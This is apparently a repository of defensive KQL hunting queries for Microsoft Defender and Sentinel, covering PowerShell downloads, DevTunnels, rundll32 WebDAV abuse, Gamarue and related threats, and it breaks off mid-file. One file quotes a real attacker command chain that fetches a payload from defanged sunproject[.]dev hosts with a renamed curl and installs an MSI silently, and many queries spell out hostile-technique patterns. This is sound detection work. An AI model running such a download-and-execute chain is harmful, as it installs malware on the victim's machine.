├── 100_days_of_kusto_2024 ├── Day1.md ├── Day10_dev_tunnels.md ├── Day10_vmware_zeroday_lpe_bug_check.md ├── Day11_azure_arc_persistence.md.md ├── Day11_powershell_comamnds.md ├── Day2.md ├── Day3.md ├── Day4.md ├── Day5.md ├── Day6_ms_ta_alert_attribution.MD ├── Day7_powershell_download_script_execution.md ├── Day8_printui.exe_suspicious_location.md ├── Day9_renamed_autoit.md └── _template.md ├── APT_turla_snake_hunt.md ├── CVE-2023-21554-Queuejump.md ├── CVE-2023-23397_kusto_queries.md ├── Cloud_Service_Discovery_SnaffPoint.md ├── GC2_Command_and_Control.md ├── Gamarue_Kusto_Queries.md ├── ISO_MOTW_Kusto_Queries.md ├── JavaScript_spawned_from_ISO.md ├── LOLBIN_MSHTA.md ├── LolBin_Winlogon_Suspicious_Network_Connection.md ├── MDE_Execution_BatloaderTTPs.md ├── MasatdonC2_Kusto_Query.md ├── OneNote_Related_Hunting_Queries.md ├── PASTE_SITES_HUNT_KUSTO_QUERIES.MD ├── PLAY_Ransomware_Kusto.md ├── PSExec_Process_Creation_Impacket_Metasploit.md ├── PowerShell_create_LNK_in_startup.md ├── Qakbot_Kusto_Queries.md ├── README.md ├── Raspberry_Robin_Kusto_Queries.md ├── RedCanary2023-ObfuscatedFilesorInfo.md ├── RedCanary2023-ProcessInjection.md ├── RedCanary2023-ServiceExecution.md ├── RedCanary2023-WMI.md ├── RedCanary2023-Windows_Command_Shell.md ├── RedCanary2023-rundll32.md ├── RedCanary2023_IngressToolTransfer.md ├── RedCanary2023_PowerShell.md ├── Regsvr32ExternalScriptLoad.md ├── Remote_Access_Tools.md ├── Rundll32_executing_DLL_from_Temp.md ├── Scheduled_Task_Kusto_Queries.md ├── SecurityIncidentStats ├── ShareFinder_Kusto_Query.md ├── T1003.001_LASS_dumping_werfault_exe.md ├── T1036.003_Masquerading-RenameSystemUtilities.md ├── T1087.001_AccountDiscovery-LocalAccount.md ├── Telegram_Shortened_Domains.md ├── USB_Device_Hunting.md ├── Ursniff_Kusto_Queries_DFIRReport.md ├── VBScript_stored_in_non-run_reg_key.md ├── Vidar_Kusto_Query.md ├── _template.md ├── admin_share_kusto_query.md ├── attackReport.md ├── autostart_persistence_kusto_query.md ├── aws_ec2_kusto_queries.md ├── blacklotus-registry-modification.md ├── brute_ratel_C4.md ├── bumblebee_dfirreport_20221114.md ├── chrome_browser_unusual_child_process.md ├── chromeloader.md ├── command_and_control-GC2-Tool.md ├── command_and_control_NotionC2.md ├── commandandcontrol_stealer_redline_pastebin.md ├── emotet-2023-new-ttps.md ├── external_data_botnets_tracker_abuse_ch.kusto ├── external_data_lookup_bazaar_abuse_ch.kusto ├── gootloader.md ├── hiding_in_plain_sight_service_names.md ├── impacket_kusto_queries.md ├── inmemory_load_of_hacktool-powersploit.md ├── inmemory_load_of_hacktool.md ├── internal_phishing.md ├── ipfs_phishing_kusto_query.md ├── lactrodectus.md ├── lolbin_certutil_download_direct_ip.md ├── lolbins_kusto_query.md ├── m365_email_hunt_rules.md ├── m365_phishing_coronation_lures.md ├── mal_clearfake_appx_download.md ├── mal_clearfake_c2.md ├── mal_clearfake_test.md ├── mal_ttp_socgholish_suspicious_wscript_network_connetion.md ├── md_cloudflared_akira.md ├── mde_AAD_recon_tools.md ├── mde_SQLServerAbuse_CMD.md ├── mde_ZIPdomains.md ├── mde_bunny_loader_detections_2023.md ├── mde_commandandcontrol_.md ├── mde_darkgate_autoitScript.md ├── mde_darkgate_detections.md ├── mde_darkgate_sharepoint_ceo_link.md ├── mde_darkgate_vbs_download.md ├── mde_exfiltration_to_S3.md ├── mde_exploitguard_events.md ├── mde_file_downloads.md ├── mde_headlessBrowserChromium.md ├── mde_initiaaccess_qr_code.md ├── mde_mal_munchkin_raas.md ├── mde_persistence_registry_winlogon_t1547.md ├── mde_rmm_tools.md ├── mde_scatteredspider.md ├── mde_script_execution_from_explorer_ZIP_function.md ├── mde_smartscreen_events.md ├── mde_smb_filecopy.md ├── mde_stealer.md ├── mde_unusual_discord_network_connection.md ├── mde_various_loldrivers.md ├── med_tampering_event.md ├── nf_mal-ttp_t1059_007_gootloader.md ├── nf_mal-ttp_t1218.011_gootloader.md ├── nf_mal_ttp_cve-2023-36025_phemedroneStealer.md ├── nf_mal_ttp_t1620_gootloader.md ├── nf_ransomware_leaksite_monitoring.md ├── nf_ttp_blackbasta_quickassist.md ├── nf_ttp_execution_apt_turla.md ├── nf_ttp_generic_kerberos_attacks.md ├── nf_ttp_ioc_3cx_DLL_SideLoading_IoC_Kusto.md ├── nf_ttp_kapeka_sandworm.md ├── nf_ttp_persistence_apt_turla.md ├── nf_ttp_polyfill_supplychain_attack.md ├── nf_ttp_possibleExfiltrationViaUSB.md ├── nf_ttp_shadowlink_sandworm.md ├── nf_ttp_smoke-sandstorm_unusual_coreuicomponent.dll-behaviour.md ├── nf_ttp_t1027-010_powershellEcodedCommand.md ├── nf_ttp_t1059-001_powershell_windowsappsdir_fin7.md ├── nf_ttp_t1127-001_suspNetworkConnMSBuild.md ├── nf_ttp_t1219_netsupportrat_fin7.md ├── nf_ttp_t1219_scattered_spider_rmm-tools.md ├── nf_ttp_t1543_scattered-spider_azure_arc_persistence.md ├── nf_ttp_t1547-001_yellowcockatoo_powershell_create_link_in_starup ├── nf_ttp_t1562-001_disabledefender.md ├── nf_ttp_t1562.001_scattered-spider_abuse conditional_access_trusted_locations.md ├── nf_ttp_t1566-001_IPFS_Web3_Phishing.md ├── nf_ttp_t1567-002_scattered-spider_exfiltration.md ├── nf_vuln_linux_cups.md ├── powerShellHunts.md ├── powershell_dirty_word_detection.md ├── proxy_shell_kusto_queries.md ├── raas_blackbyte.md ├── rclone_detection.md ├── redditC2.md ├── registry_run_key_persistence.md ├── remcos_rat_kusto_queries_09032023.md ├── scheduled_task_peristence_from_roaming_folder.md ├── tampering_with_windows_event_log.md ├── test.bat ├── test.csv ├── ttp_initialaccess_phishing_zip_domains.md ├── ttp_initialaccess_teamPhishing.md ├── ttp_pythonexecuted_from_pythonsetupfile.md └── ttp_usb_exfiltration. md /100_days_of_kusto_2024/Day1.md: -------------------------------------------------------------------------------- 1 | # Day 1 - Decode base64 with KQL 2 | 3 | ## Description 4 | 5 | The below query provides an example of how the base64_decode_tostring() function can be used to decode a field value that is base64 encoded 6 | 7 | ``` KQL 8 | 9 | let base64 = "SW52b2tlLVdtaU1ldGhvZCAtQ29tcHV0ZXJOYW1lICRTZXJ2ZXIgLUNsYXNzIENDTV9Tb2Z0d2FyZVVwZGF0ZXNNYW5hZ2VyIC1OYW1lIEluc3RhbGxVcGRhdGVzIC0gQXJndW1lbnRMaXN0ICgsICRQZW5kaW5nVXBkYXRlTGlzdCkgLU5hbWVzcGFjZSByb290WyZjY20mXWNsaWVudHNkayB8IE91dC1OdWxs"; 10 | print base64_decode_tostring(base64) 11 | 12 | ``` -------------------------------------------------------------------------------- /100_days_of_kusto_2024/Day10_dev_tunnels.md: -------------------------------------------------------------------------------- 1 | UPDATE: Looks like MS released GPO controls finally: https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/policies 2 | This query is designed to detect suspicious network communications involving Visual Studio's DevTunnels feature, which is used for secure remote connections and debugging. The query specifically looks for network events where the destination URL ends with tunnels.api.visualstudio.com or devtunnels.ms. It excludes legitimate Visual Studio processes (ServiceHub.Host.dotnet.x64.dll or ServiceHub.Host.dotnet.arm64) to focus on potentially unauthorized or malicious activity. By monitoring these criteria, the query aims to identify unusual or suspicious use of DevTunnels that could indicate unauthorized remote access or data exfiltration. 3 | 4 | DeviceNetworkEvents 5 | | where RemoteUrl endswith "tunnels.api.visualstudio.com" or RemoteUrl endswith "devtunnels.ms" 6 | | where InitiatingProcessVersionInfoOriginalFileName != @"ServiceHub.Host.dotnet.x64.dll" 7 | | where InitiatingProcessVersionInfoFileDescription != @"ServiceHub.Host.dotnet.arm64" 8 | 9 | This query is designed to detect suspicious file activities in folders named "DevTunnels," which are used in Visual Studio for secure remote connections. The goal is to identify potential unauthorized or malicious operations within these folders, which could indicate an attempt to establish or maintain unauthorized access to the system. 10 | 11 | The query works by: 12 | 13 | Monitoring file events (DeviceFileEvents) where the folder path includes "DevTunnels." 14 | Excluding known legitimate software, specifically Dell Display Manager 2, to avoid false positives. 15 | In simple terms, this query helps in identifying unusual file activities in "DevTunnels" folders, which might be used by attackers for malicious purposes, while ignoring activities from trusted software. 16 | 17 | DeviceFileEvents 18 | | where FolderPath has "DevTunnels" 19 | //exclude Dell Display Manager | where InitiatingProcessFileName != "DellDisplayManager.exe" 20 | 21 | Device process events hunt query for VSCode DevTunells where the executable has been renamed. 22 | 23 | DeviceProcessEvents 24 | | where InitiatingProcessVersionInfoOriginalFileName =~ "electron.exe" and ProcessCommandLine has_all ("tunnel",".exe") 25 | -------------------------------------------------------------------------------- /100_days_of_kusto_2024/Day10_vmware_zeroday_lpe_bug_check.md: -------------------------------------------------------------------------------- 1 | # Day 8 - Active exploitation of VMware ESX hypervisor escape ESXicape 2 | 3 | ## Description 4 | 5 | Yesterday, VMware quietly released patches for three ESXi zero day vulnerabilities: CVE-2025–22224, CVE-2025–22225, CVE-2025–22226. Thsi KQL allows you to identify VMWare virtual machines in your environment. 6 | 7 | ### Example Script 8 | 9 | ``` 10 | 11 | 12 | 13 | ``` 14 | 15 | ## References 16 | https://cyberplace.social/@GossiTheDog/114114843502983550 17 | https://doublepulsar.com/use-one-virtual-machine-to-own-them-all-active-exploitation-of-esxicape-0091ccc5bdfc 18 | 19 | ## Query MDE 20 | 21 | ``` KQL 22 | 23 | // VMWare hypervisor escape possibilities. Checks for VMs that could have CVEs associated with local privilege escalation 24 | let VMWareVM = DeviceProcessEvents 25 | | where FileName has "vmtoolsd.exe" or FileName has "vmwaretray.exe" 26 | | distinct DeviceId; 27 | DeviceTvmSoftwareVulnerabilities 28 | | where DeviceId in~ (VMWareVM) 29 | | where CveId in~ ("CVE-2025-21418","CVE-2025-21391") // replace with LPE CVE IDs of your choosing 30 | 31 | ``` 32 | 33 | 34 | -------------------------------------------------------------------------------- /100_days_of_kusto_2024/Day11_azure_arc_persistence.md.md: -------------------------------------------------------------------------------- 1 | Defender For Endpoint 2 | // Unexpected installation of azure arc agent - service installation 3 | let ServiceNames = datatable(name:string)["himds.exe","gc_arc_service.exe","gc_extension_service.exe"]; 4 | DeviceEvents 5 | | where ActionType =~ "ServiceInstalled" 6 | | extend ServiceName = tostring(parse_json(AdditionalFields).ServiceName) 7 | | extend ServiceAccount = tostring(parse_json(AdditionalFields).ServiceAccount) 8 | | extend ServiceStartType = tostring(parse_json(AdditionalFields).ServiceStartType) 9 | | extend ServiceType = tostring(parse_json(AdditionalFields).ServiceType) 10 | | where ServiceName has_any (ServiceNames) 11 | // Unexpected installation of azure arc agent - filepaths 12 | let AzureArcServicePaths = datatable(name:string)[@"\\AzureConnectedMachineAgent\\GCArcService\\GC"]; 13 | DeviceFileEvents 14 | | where ActionType =~ "FileCreated" 15 | | where FolderPath has_any (AzureArcServicePaths) 16 | -------------------------------------------------------------------------------- /100_days_of_kusto_2024/Day11_powershell_comamnds.md: -------------------------------------------------------------------------------- 1 | 2 | # Day 11 - Suspicious PowerShell Commandline 3 | 4 | ## Description 5 | Detection opportunity: PowerShell using invoke-expression to download content 6 | 7 | This pseudo detection analytic identifies instances of PowerShell using invoke-expression to download content from an http URL. Adversaries attempting to deliver threats like LummaC2 use this function to download remotely hosted scripts and code for further exploitation of an endpoint. Note that legitimate package management and orchestration utilities like Chocolatey may use this function to update themselves. 8 | 9 | ### Example Script 10 | 11 | ``` 12 | 13 | N/A 14 | 15 | ``` 16 | 17 | ## References 18 | https://redcanary.com/blog/threat-intelligence/intelligence-insights-november-2024/ 19 | 20 | ## Query MDE 21 | 22 | ``` KQL 23 | 24 | DeviceProcessEvents 25 | | where InitiatingProcessFileName has_any ("powershell.exe") and ProcessCommandLine has_any ("iex",".invoke","invoke-expression") and ProcessCommandLine has" http" 26 | | project Timestamp, DeviceName, AccountName, InitiatingProcessParentFileName, InitiatingProcessFileName, InitiatingProcessCommandLine, FileName, ProcessCommandLine 27 | 28 | 29 | ``` 30 | 31 | 32 | 33 | -------------------------------------------------------------------------------- /100_days_of_kusto_2024/Day2.md: -------------------------------------------------------------------------------- 1 | # Day 1 - calculating the difference between two dates using kql 2 | 3 | ## Description 4 | 5 | The below query provides an example of how to calculate teh difference between two date values using kql 6 | 7 | ``` KQL 8 | 9 | let emailRecieved = datetime("2024-01-31T11:11:12Z"); 10 | let fileExecuted = datetime("2024-01-31T10:26:20Z"); 11 | print fileExecuted - emailRecieved 12 | 13 | ``` -------------------------------------------------------------------------------- /100_days_of_kusto_2024/Day3.md: -------------------------------------------------------------------------------- 1 | # Day 3 - Search for a value in multiple tables 2 | 3 | ## Description 4 | 5 | The below query provides an example of how the serach command can be used to find results across all tables 6 | 7 | ``` KQL 8 | 9 | search "my-keyword" 10 | 11 | ``` 12 | 13 | The below query provides an example of how the serach command can be used to find results in a specific table 14 | 15 | ``` KQL 16 | 17 | table1 18 | | search "my-keyword" 19 | 20 | ``` -------------------------------------------------------------------------------- /100_days_of_kusto_2024/Day4.md: -------------------------------------------------------------------------------- 1 | # Day 4 - Using let statements 2 | 3 | ## Description 4 | 5 | Basic use of let statement to build a table of values that can be used in a subsequent query 6 | 7 | ``` KQL 8 | 9 | let mary_ips = //sets a variable called marey_ips 10 | Employees //use the Employees table 11 | | where name has "Mary" //filter results to those that have Mary in the name field 12 | | distinct ip_addr; //output a distinct list of IP addresses assigned to users called Mary the ; ends the let statement 13 | OutboundNetworkEvents // use the OutboundNetworkEvents table 14 | | where src_ip in~ (mary_ips) // filter on the src_ip field using the ips we produced in our let statement 15 | | summarize dcount(url) // provide a distinct count of urls visited by IP addresses assigned to Mary's 16 | 17 | ``` -------------------------------------------------------------------------------- /100_days_of_kusto_2024/Day5.md: -------------------------------------------------------------------------------- 1 | # Day 5 - A basic join of two tables 2 | 3 | ## Description 4 | 5 | The below query provides an example of how to join two tables that share a common field called hostname 6 | 7 | ``` KQL 8 | 9 | FileCreationEvents 10 | | join Employees on $left.hostname == $right.hostname 11 | 12 | ``` -------------------------------------------------------------------------------- /100_days_of_kusto_2024/Day6_ms_ta_alert_attribution.MD: -------------------------------------------------------------------------------- 1 | # Day 6 - Search alerts for Microsoft Threat Actor names 2 | 3 | ## Description 4 | 5 | The below query provides an example of how to search alerts for Microsoft Threat Actor names. This can be used to understand if there have been any alerts related to Microosft TAs in your environement. 6 | 7 | # Sentinel 8 | 9 | ``` KQL 10 | 11 | let TANames = datatable(PreviousName: string)[ 12 | "Typhoon", 13 | "Sandstorm", 14 | "Rain", 15 | "Sleet", 16 | "Blizzard", 17 | "Hail", 18 | "Dust", 19 | "Cyclone", 20 | "Tempest", 21 | "Tsunami", 22 | "Flood", 23 | "Storm-"]; 24 | SecurityAlert 25 | | where AlertName has_any (TANames) 26 | 27 | ``` 28 | 29 | # MDE 30 | 31 | 32 | ``` KQL 33 | 34 | let TANames = datatable(PreviousName: string)[ 35 | "Typhoon", 36 | "Sandstorm", 37 | "Rain", 38 | "Sleet", 39 | "Blizzard", 40 | "Hail", 41 | "Dust", 42 | "Cyclone", 43 | "Tempest", 44 | "Tsunami", 45 | "Flood", 46 | "Storm-"]; 47 | AlertInfo 48 | | where Title has_any (TANames) 49 | 50 | ``` -------------------------------------------------------------------------------- /100_days_of_kusto_2024/Day7_powershell_download_script_execution.md: -------------------------------------------------------------------------------- 1 | # Day 7 - Script launching PowerShell to download and execute a payload 2 | 3 | ## Description 4 | 5 | The following pseudo-detection analytic will identify wscript, cscript, or mshta launching PowerShell to download and execute a payload. Threats like Saffron Starling abuse this cmdlet to download and launch malicious code. Note that this cmdlet can be used legitimately for maintenance tasks and device administration, so you may need to investigate further to determine if the activity is evil. Childprocs and filemods to suspicious directories can be signs of successful payload execution. 6 | 7 | ### Example Script 8 | 9 | ``` 10 | "C:\Windows\System32\cmd.exe" /c cd /d "C:\Users\user\AppData\Local\Temp\" & copy c:\windows\system32\curl.exe TNheBOJElq.exe & TNheBOJElq.exe -o "C:\Users\user\Documents\QMQjaBdqIo.pdf" hxxps://bologna.sunproject[.]dev/download/pdf & "C:\Users\user\Documents\QMQjaBdqIo.pdf" & TNheBOJElq.exe -o bLhLldebqq.msi hxxps://rome.sunproject[.]dev/download/agent & C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qn 11 | ``` 12 | 13 | ## References 14 | https://redcanary.com/blog/threat-intelligence/intelligence-insights-february-2025/ 15 | 16 | ## Query MDE 17 | 18 | ``` KQL 19 | 20 | DeviceProcessEvents 21 | | where InitiatingProcessParentFileName has_any ("wscript.exe", "cscript.exe", "mshta.exe") and InitiatingProcessFileName has_any ("cmd.exe", "powershell.exe") and ProcessCommandLine has_any ("invoke_webrequest") 22 | | project Timestamp, DeviceName, AccountName, InitiatingProcessParentFileName, InitiatingProcessFileName, InitiatingProcessCommandLine, FileName, ProcessCommandLine 23 | 24 | ``` 25 | -------------------------------------------------------------------------------- /100_days_of_kusto_2024/Day8_printui.exe_suspicious_location.md: -------------------------------------------------------------------------------- 1 | # Day 8 - 2 | 3 | ## Description 4 | 5 | **Detection opportunity:** printui.exe relocated to a suspicious location 6 | This pseudo detection analytic identifies instances of printui.exe relocated outside of Windows\System32. Relocation of this binary outside of System32 will be highly unusual, although third-party system administrative binaries may occasionally utilize a relocated and/or renamed version of the binary. Vulnerable DLLs like printui.dll can be abused by threats like Tangerine Turkey for **DLL search order hijacking** and side-loading. Here at Red Canary we have profiled System32 binaries, collected and stored their expected metadata, and used the information to build detection analytics. 7 | 8 | ### Example Script / Pseudo Code 9 | 10 | ``` 11 | 12 | Pseudo query - process_path_is_unexpected == (printui) 13 | 14 | ``` 15 | 16 | ## References 17 | 18 | https://redcanary.com/blog/threat-intelligence/intelligence-insights-january-2025/ 19 | 20 | ## Query MDE 21 | 22 | ### Device Process Events 23 | 24 | ``` KQL 25 | 26 | DeviceProcessEvents 27 | | where ( InitiatingProcessFileName =~ "printui.exe" and not ( InitiatingProcessFolderPath has_any ( @"Windows\System32", @"Windows\\System32", @"Windows\SysWOW64" ) ) ) or ( FileName =~ "printui.exe" and not (FolderPath has_any ( @"Windows\System32", @"Windows\\System32", @"Windows\SysWOW64" ) ) ) 28 | 29 | ``` 30 | 31 | ### Device File Events 32 | 33 | ``` KQL 34 | //Lower Fidelity 35 | DeviceFileEvents 36 | | where ( ActionType in~ ("FileCreated","FileModified") and FileName =~ "printui.exe" and not ( FolderPath has_any ( @"Windows\System32", @"Windows\\System32", @"Windows\SysWOW64" ) ) ) 37 | 38 | ``` 39 | -------------------------------------------------------------------------------- /100_days_of_kusto_2024/Day9_renamed_autoit.md: -------------------------------------------------------------------------------- 1 | # Day 9 - Detection opportunity: Renamed instances of AutoIT 2 | 3 | ## Description 4 | 5 | This pseudo detection analytic identifies renamed instances of AutoIT. Adversaries—like those behind HijackLoader—use this tool to execute scripts with goals including C2 communication and additional payload delivery. The renamed binary may be located in a suspicious location like TEMP, APPDATA, or with a path that includes seemingly randomly generated names. 6 | 7 | ### Example Script / Pseudo Code 8 | 9 | ``` 10 | 11 | process_is_renamed == (autoit)* 12 | 13 | ``` 14 | 15 | ## References 16 | 17 | https://redcanary.com/blog/threat-intelligence/intelligence-insights-december-2024/ 18 | 19 | ## Query MDE 20 | 21 | ### Renamed autoit files from certain locations 22 | 23 | ``` KQL 24 | 25 | let SuspiciousLocations = dynamic(["C:\\Users\\*", "C:\\ProgramData\\*", "C:\\Windows\\Temp\\*", "C:\\Users\\*\\AppData\\Local\\*", "C:\\Users\\*\\AppData\\Roaming\\*"]); 26 | let KnownAutoITNames = dynamic(["autoit.exe", "autoit3.exe"]); 27 | DeviceProcessEvents 28 | | where ProcessCommandLine has_any ("autoit", "autoit3") // Catch common AutoIT executions 29 | | where not(InitiatingProcessFileName in (KnownAutoITNames)) // Exclude expected process names 30 | | where FolderPath has_any (SuspiciousLocations) // Check for execution from suspicious locations 31 | | where InitiatingProcessFileName !contains "Updater" // Exclude legitimate software updaters 32 | | extend RenamedAutoIT = iff(InitiatingProcessFileName !in (KnownAutoITNames), "Renamed AutoIT Instance", "Legit AutoIT") 33 | | project Timestamp, DeviceName, InitiatingProcessParentFileName, InitiatingProcessCommandLine, InitiatingProcessFileName, FolderPath, RenamedAutoIT 34 | 35 | ``` 36 | 37 | ### Renamed autoit files 38 | 39 | ``` KQL 40 | 41 | DeviceProcessEvents 42 | | where ( FileName !has "autoit" and ProcessVersionInfoOriginalFileName has_any ("autoit", "autoit3") ) or ( InitiatingProcessFileName !has "autoit" and InitiatingProcessVersionInfoOriginalFileName has_any ("autoit", "autoit3") ) 43 | 44 | ``` 45 | -------------------------------------------------------------------------------- /100_days_of_kusto_2024/_template.md: -------------------------------------------------------------------------------- 1 | # Day 8 - 2 | 3 | ## Description 4 | 5 | 6 | 7 | ### Example Script 8 | 9 | ``` 10 | 11 | 12 | 13 | ``` 14 | 15 | ## References 16 | 17 | 18 | ## Query MDE 19 | 20 | ``` KQL 21 | 22 | 23 | 24 | ``` 25 | -------------------------------------------------------------------------------- /CVE-2023-21554-Queuejump.md: -------------------------------------------------------------------------------- 1 | # CVE-2023-21554 2 | 3 | ## Source: Fabian Bader [@fabian_bader](https://twitter.com/fabian_bader) I made some tweaks to Fabians original queries to utilise slightly different fields. 4 | 5 | ## Identify hosts with the service and listening port: 6 | 7 | ### MDE 8 | 9 | ``` 10 | DeviceNetworkEvents 11 | | where Timestamp > ago(30d) 12 | | where ActionType == "ListeningConnectionCreated" 13 | | where LocalPort == "1801" 14 | | where InitiatingProcessVersionInfoOriginalFileName has "MQSVC" 15 | | summarize by DeviceName 16 | ``` 17 | 18 | ### Sentinel 19 | 20 | ``` 21 | DeviceNetworkEvents 22 | | where TimeGenerated > ago(30d) 23 | | where ActionType == "ListeningConnectionCreated" 24 | | where LocalPort == "1801" 25 | | where InitiatingProcessVersionInfoOriginalFileName has "MQSVC" 26 | | summarize by DeviceName 27 | ``` 28 | 29 | ## Look for possible exploitation of CVE-2023-21554 30 | 31 | ``` 32 | //possible exploitation of CVE-2023-21554 33 | //if successful look for a a follow-up outbound connection to the same external IP or to a possible secondary C2 connection. This would likely result in a child process being spawned from mqsvc.exe that should also be investigated. On the external facing infra this will likely materialise in a webshell or similar. 34 | DeviceNetworkEvents 35 | | where InitiatingProcessFileName =~ "mqsvc.exe" and LocalPort == 1801 and ActionType == 'InboundConnectionAccepted' 36 | ``` 37 | 38 | ### Look for child processes spawned by mqsvc.exe 39 | 40 | ``` 41 | DeviceProcessEvents 42 | | where ( InitiatingProcessFileName has "mqsvc.exe" and isnotempty(FileName) ) or (InitiatingProcessParentFileName has "mqsvc.exe" and isnotempty(InitiatingProcessFileName) ) 43 | ``` 44 | -------------------------------------------------------------------------------- /CVE-2023-23397_kusto_queries.md: -------------------------------------------------------------------------------- 1 | # EXPERIMENTAL 2 | 3 | # CVE-2023-23397 4 | 5 | Big hand to Dominic Chell, Florian Roth, Nasreddine Bencherchali for their research into this vulnerability. 6 | 7 | References: 8 | - MDSec Post: https://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/ 9 | - Florian Roth / Nasreddine Bencherchali: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_rundll32_webdav_client_susp_execution.yml 10 | 11 | 12 | ## SecurityEvent 13 | 14 | `SecurityEvent | where EventID == 4688 | where (ParentProcessName endswith @'\svchost.exe' and NewProcessName endswith @'\rundll32.exe' and CommandLine contains @'C:\windows\system32\davclnt.dll,DavSetCookie' and CommandLine matches regex @'(?i)://\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}') and not (CommandLine has_any (@'://10.',@'://192.168.',@'://172.16.',@'://172.17.',@'://172.18.',@'://172.19.',@'://172.20.',@'://172.21.',@'://172.22.',@'://172.23.',@'://172.24.',@'://172.25.',@'://172.26.',@'://172.27.',@'://172.28.',@'://172.29.',@'://172.30.',@'://172.31.',@'://127.',@'://169.254.'))` 15 | 16 | `//pseudocode 17 | SecurityEvent 18 | | where ((Process contains ("rundll32.exe") and CommandLine contains("davclnt.dll")) 19 | | where not ((ParentProcessName contains ("cmd.exe")) 20 | | project TimeGenerated, Computer, tostring(EventID), ParentProcessName, NewProcessName, CommandLine, SubjectUserName, SourceComputerId, processID=tolong(NewProcessId), parentProcessID=tolong(ProcessId), EventData 21 | | order by TimeGenerated` 22 | 23 | 24 | ## Defender for Endpoint Queries 25 | 26 | `DeviceProcessEvents | where (InitiatingProcessFolderPath endswith @'\svchost.exe' and FolderPath endswith @'\rundll32.exe' and ProcessCommandLine contains @'C:\windows\system32\davclnt.dll,DavSetCookie' and ProcessCommandLine matches regex @'(?i)://\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}') and not (ProcessCommandLine has_any (@'://10.',@'://192.168.',@'://172.16.',@'://172.17.',@'://172.18.',@'://172.19.',@'://172.20.',@'://172.21.',@'://172.22.',@'://172.23.',@'://172.24.',@'://172.25.',@'://172.26.',@'://172.27.',@'://172.28.',@'://172.29.',@'://172.30.',@'://172.31.',@'://127.',@'://169.254.'))` 27 | 28 | `//playing with these at present 29 | DeviceNetworkEvents 30 | | extend f = extract(@'(?i)://(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})',1,InitiatingProcessCommandLine) 31 | | where InitiatingProcessFileName =~ "rundll32.exe" and ipv4_is_private(RemoteIP) == false and isnotempty(f) //and not (RemoteIP has_any ("127.","169.254.")) 32 | | project TimeGenerated, ActionType, DeviceName, InitiatingProcessFileName, InitiatingProcessFolderPath, InitiatingProcessCommandLine, InitiatingProcessId, InitiatingProcessMD5, InitiatingProcessParentFileName, InitiatingProcessParentId, LocalIP, LocalPort, RemoteIP, RemotePort, RemoteUrl` 33 | 34 | `//playing with these at present 35 | DeviceNetworkEvents 36 | | extend f = extract(@'(?i)://(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})',1,InitiatingProcessCommandLine) 37 | | where InitiatingProcessFileName =~ "rundll32.exe" and ipv4_is_private(RemoteIP) == false and isnotempty(f) and not (RemoteIP has_any ("127.","169.254.")) 38 | | project TimeGenerated, ActionType, DeviceName, InitiatingProcessFileName, InitiatingProcessFolderPath, InitiatingProcessCommandLine, InitiatingProcessId, InitiatingProcessMD5, InitiatingProcessParentFileName, InitiatingProcessParentId, LocalIP, LocalPort, RemoteIP, RemotePort, RemoteUrl` 39 | 40 | `DeviceTvmSoftwareVulnerabilities 41 | | where CveId =~ "CVE-2023-23397" 42 | | distinct DeviceName` 43 | 44 | `//Identify outbound SMB connections to public IPs 45 | DeviceNetworkEvents 46 | | where RemotePort == 445 and ipv4_is_private(RemoteIP) == false and RemoteIP !~ "127.0.0.1" and RemoteIP !startswith "169.254."` 47 | -------------------------------------------------------------------------------- /Gamarue_Kusto_Queries.md: -------------------------------------------------------------------------------- 1 | # Gamarue 2 | Gamarue is a worm that primarily spreads via USB drives. Despite its command and control (C2) infrastructure being disrupted in 2017, Gamarue keeps worming its way through many environments. 3 | 4 | # Source: https://redcanary.com/threat-detection-report/threats/gamarue/ 5 | 6 | ## Special characters in rundll32 command line 7 | ``` 8 | //Editors’ note: While the analysis and detection opportunities remain applicable, this threat page was written for a previous Threat Detection Report and has not been updated in 2022. 9 | //Special characters in rundll32 command line 10 | //ATT&CK technique(s): T1218.011 Signed Binary Proxy Execution: Rundll32 11 | //ATT&CK tactic(s): Defense Evasion, Execution 12 | //Details: The main detection analytic that helped us catch so much Gamarue was based on what we noticed about how Gamarue executed rundll32.exe. As we examined multiple Gamarue detections over time, we noticed that their rundll32.exe command lines consistently used the same number of characters in a repeatable pattern—25 characters followed by a period followed by 25 additional characters, then a comma and 16 more characters. For example: 13 | //source: https://redcanary.com/threat-detection-report/threats/gamarue/ 14 | DeviceProcessEvents 15 | | where InitiatingProcessFileName =~ "rundll32.exe" and InitiatingProcessCommandLine matches regex @'(?i)"C:\\Windows\\system32\\rundll32\.exe"\s+\\\S{25}\.\S{25},\S{16}' 16 | ``` 17 | 18 | ## Windows Installer (msiexec.exe) external network connections 19 | ``` 20 | //Editors’ note: While the analysis and detection opportunities remain applicable, this threat page was written for a previous Threat Detection Report and has not been updated in 2022. 21 | //Windows Installer (msiexec.exe) external network connections 22 | //ATT&CK technique(s): T1218.007 Signed Binary Proxy Execution: Msiexec, T1055.012 Process Injection: Process Hollowing 23 | //ATT&CK tactic(s): Defense Evasion, Command and Control 24 | //Details: We observed Gamarue injecting into the signed Windows Installer msiexec.exe, which subsequently connected to C2 domains. Adversaries commonly use msiexec.exe to proxy the execution of malicious code through a trusted process. We detected Gamarue by looking for msiexec.exe without a command line making external network connections. Though many Gamarue C2 servers were disrupted in 2017, we found that some domains were active in 2020, like the one in the following example (4nbizac8[.]ru): 25 | //source: https://redcanary.com/threat-detection-report/threats/gamarue/ 26 | DeviceNetworkEvents 27 | | where InitiatingProcessFileName =~ "msiexec.exe" and isnotempty(RemoteUrl) 28 | ``` 29 | 30 | ## ROT13 registry modifications LNK file 31 | ``` 32 | //Bonus forensic analysis opportunity 33 | //ROT13 registry modifications 34 | //ATT&CK technique(s): T1112 Modify Registry 35 | //ATT&CK tactic(s): Defense Evasion/Execution 36 | //Details: While this isn’t a detection opportunity, we wanted to share a tip for how we identify the source LNK that executed Gamarue in many of our detections. We observed that the parent process of rundll32.exe (often explorer.exe) usually creates a registry value in the UserAssist subkey. UserAssist tracks applications that were executed by a user and encodes data using the ROT13 cipher. Because Gamarue is often installed by a user clicking an LNK file, if you’re trying to figure out the source of Gamarue, check out the registry key 